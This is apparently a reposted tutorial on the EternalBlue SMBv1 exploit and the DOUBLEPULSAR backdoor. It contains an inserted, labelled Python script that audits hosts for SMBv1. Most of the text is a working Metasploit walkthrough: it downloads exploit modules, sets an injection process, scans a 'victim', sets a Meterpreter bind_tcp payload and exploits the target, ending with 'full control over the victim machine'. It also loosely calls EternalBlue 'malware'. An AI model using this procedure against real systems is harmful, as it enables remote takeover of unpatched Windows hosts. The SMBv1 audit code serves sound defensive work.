EternalBlue is malware developed by the National Security Agency (NSA) that exploits the Windows Server Message Block version 1 (SMBv1) protocol. The tool is believed to have been released by the Shadow Brokers hacker group in April 2017, and it was used in the WannaCry cyber attack.

SMB version 1 (SMBv1) in various versions of Microsoft Windows accepts specially crafted packets from remote attackers. This is the root of the vulnerability in Windows, which allows remote code execution and was particularly targeted at Windows 7 and XP.

The NSA tool called DOUBLEPULSAR, which is designed to provide covert backdoor access to a Windows system, was immediately picked up by attackers.

Once installed, DOUBLEPULSAR waits for certain types of data to be sent over port 445. When that data arrives, the implant provides a distinctive response.
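A defender's check for the SMBv1 exposure described above, as an added example that is not part of the original post: it builds an SMB1-only NEGOTIATE request and classifies the reply, so you can inventory which of your own hosts still negotiate SMBv1 on port 445. The function names, the simplified constructed sample replies, and the reading of a missing or SMB2-only reply as "SMBv1 not negotiated" are assumptions of this example.

```python
import socket
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
HDR = "<4sBIBHH8sHHHHH"  # the 32-byte SMB1 header, little-endian

def _frame(smb):
    """Prefix an SMB message with the 4-byte NetBIOS session header."""
    return b"\x00" + struct.pack(">I", len(smb))[1:] + smb

def _header(flags):
    return struct.pack(HDR, SMB1_MAGIC, SMB_COM_NEGOTIATE, 0, flags, 0xC801,
                       0, b"\x00" * 8, 0, 0, 0xFEFF, 0, 0)

def build_negotiate(dialects=(b"NT LM 0.12",)):
    """SMB1 NEGOTIATE request that offers only SMB1 dialects."""
    body = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    return _frame(_header(0x18) + struct.pack("<BH", 0, len(body)) + body)

def classify_response(data):
    """Return 'smbv1-enabled', 'smbv1-refused' or 'no-smbv1-answer'."""
    if len(data) < 4 + 32 + 3 or data[4:8] != SMB1_MAGIC:
        return "no-smbv1-answer"  # silence, reset, or an SMB2-only reply
    command, status = struct.unpack_from("<BI", data, 8)
    if command != SMB_COM_NEGOTIATE or status != 0 or data[36] == 0:
        return "smbv1-refused"
    (dialect_index,) = struct.unpack_from("<H", data, 37)
    return "smbv1-refused" if dialect_index == 0xFFFF else "smbv1-enabled"

def audit_host(host, port=445, timeout=3.0):
    """Probe a host you administer and classify its reply."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_negotiate())
            return classify_response(s.recv(1024))
    except OSError:  # refused, reset or timed out
        return "no-smbv1-answer"

def sample_reply(dialect_index):
    """Constructed server reply (not a capture) for offline checking."""
    return _frame(_header(0x98) + struct.pack("<BHH", 1, dialect_index, 0))

if __name__ == "__main__":
    for name, data in [("dialect 0 chosen", sample_reply(0)),
                       ("no dialect chosen", sample_reply(0xFFFF)),
                       ("SMB2-only reply", _frame(b"\xfeSMB" + b"\x00" * 60))]:
        print(name, "->", classify_response(data))
```

A host reported as `smbv1-enabled` still speaks the protocol this page describes and is a candidate for disabling SMBv1 and applying the MS17-010 update.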

EternalBlue Live Demonstration using Metasploit

We need to download the scanner and the exploit and add them to Metasploit. Open a terminal window and type the following commands.

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

Move the file smb_ms17_010.rb into the folder /usr/share/metasploit-framework/modules/auxiliary/scanner/smb

Then copy eternalblue_doublepulsar.rb and the deps folder into /usr/share/metasploit-framework/modules/exploits/windows/smb

Now open eternalblue_doublepulsar.rb in any editor and change the directory paths for ETERNALBLUE and DOUBLEPULSAR to the SMB exploit directory, /usr/share/metasploit-framework/modules/exploits/windows/smb.

Then specify the name of the process to be injected; here we have specified explorer.exe.

Then launch msfconsole and use the auxiliary scanner module smb_ms17_010.rb.

> use auxiliary/scanner/smb/smb_ms17_010
> show options

Now set RHOSTS to the victim's IP address.

> set RHOSTS IP
> run

It checks whether the host is vulnerable and also displays details of the victim machine.

Now we can move on to the EternalBlue and DoublePulsar exploit.

> use exploit/windows/smb/eternalblue_doublepulsar
> set payload windows/x64/meterpreter/bind_tcp

> show options

Then set RHOST to the victim's IP address and set the target architecture.

> set RHOST IP
> set targetarchitecture x64
> show options

Then type exploit and press Enter.

It's done: we now have a Meterpreter session and the vulnerability has been exploited.

The system has now been exploited successfully, and we have full control over the victim machine.

(Source: https://gbhackers.com/windows-eternalblue-doublepulsar/)
